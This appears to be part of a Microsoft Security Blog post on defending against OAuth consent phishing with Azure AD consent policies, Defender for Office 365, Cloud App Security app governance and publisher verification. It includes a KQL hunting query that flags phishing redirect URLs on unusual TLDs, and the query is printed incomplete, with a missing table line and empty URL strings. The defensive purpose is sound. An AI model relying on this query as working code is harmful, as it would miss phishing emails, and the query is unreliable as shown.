With risk-based step-up consent, Azure Active Directory (Azure AD) blocks end users from being able to grant consent to apps that are considered potentially risky. For example, a newly-registered multi-tenant app that has not been publisher-verified might be considered risky, and end users would not be allowed to grant consent, even if they visit the OAuth phishing URL.

Azure AD puts admins in control over when users are allowed to grant consent to apps. This is a powerful mechanism for preventing the threat in the first place, and Microsoft recommends that organizations review settings for when users can grant consent. Microsoft recommends choosing the out-of-the-box option where users are only allowed to consent to apps from verified publishers, and only for chosen, lower risk permissions. For additional granularity, admins can also create custom consent policies, which dictate the conditions for allowing users to grant consent, including for specific apps, publishers, or permissions.

Blocking consent phishing emails with Microsoft Defender for Office 365

Microsoft Defender for Office 365 uses advanced filtering technologies backed by machine learning, IP and URL reputation systems, and unparalleled breadth of signals to provide durable protection against phishing and other malicious emails, helping to block consent phishing campaigns out of the gate. Anti-phishing policies in Defender for Office 365 help protect organizations against impersonation-based phishing attacks.

Microsoft researchers are constantly tracking OAuth 2.0 URL techniques and use this knowledge to provide feedback to email filtering systems. This helps ensure that Microsoft Defender for Office 365 is providing protection against the latest OAuth phishing attacks and other threats. Signals from Microsoft Defender Office 365 helps identify malicious apps and prevent users from accessing them, and provides rich threat data that organizations can query and investigate using advanced hunting capabilities.

Identifying malicious apps with Microsoft Cloud App Security

Microsoft Cloud App Security policies such as activity policies, anomaly detection, and OAuth app policies help organizations manage apps connected to their environment. The new app governance add-on feature to Microsoft Cloud App Security helps organizations:

  • Define appropriate Microsoft 365 app behavior with data, users, and other apps
  • Quickly detect unusual app behavior activity that varies from the baseline, and
  • Disable an app when it behaves differently than expected

Figure 6. App governance in Microsoft 365 Compliance

To give organizations and users confidence in using apps in the Microsoft 365 ecosystem, the Microsoft 365 App Compliance Program enables app developers to establish authenticity of their applications. The program includes publisher verification, publisher attestation, and Microsoft 365 certification.

Investigating and hunting for consent phishing attacks

Security operations teams can use advanced hunting capabilities in Microsoft 365 Defender to locate consent phishing emails and other threats. Microsoft 365 Defender consolidates and correlates email threat data from Microsoft Defender for Office 365, app signals from Microsoft Cloud App Security, and intelligence from other Microsoft services to provide a comprehensive end-to-end view of attacks. Security operations teams can then use the rich tools in Microsoft 365 Defender to investigate and remediate attacks.

OAuth URL pattern redirects to domain with unusual TLD

The consent phishing campaigns we described in this blog used a variety of unusual TLDs for communication with the attacker infrastructure. Use query below to find inbound emails with suspicious OAuth patterns. The suggested TLDs are based on our investigations. Security teams can modify the TLDs to expand the search. Run query in Microsoft 365 Defender.

let UnusualTlds = pack_array('.uno','.host','.site','.tech','.website','.space','.online');
| where Url startswith "" or Url startswith ""
| where Url has "redirect_uri"
| where Url has_any(UnusualTlds)
| join EmailEvents on $left.NetworkMessageId == $right.NetworkMessageId
| where EmailDirection == "Inbound"

Best practices for hardening organizations against consent phishing

In addition to taking full advantage of the tools available to them in Microsoft 365 and Microsoft Azure, administrators can further strengthen defenses against consent phishing by following these measures:

Additional resources

App governance add-on feature for Microsoft Cloud App Security is initially available as a public preview to existing Microsoft Cloud App Security Customers in North America and Europe with other regions being added gradually the next few months.

To get started with app governance, visit our quick start guide. To learn more about app governance, visit our documentation. To launch app governance portal in Microsoft 365 Compliance center, go to

Refer to our documentation for reference on configuring and managing user consent and app permissions in Azure AD. For more information on Microsoft Cloud App Security refer to our blog and Microsoft Cloud App Security explainer video.

The post Microsoft delivers comprehensive solution to battle rise in consent phishing emails appeared first on Microsoft Security Blog.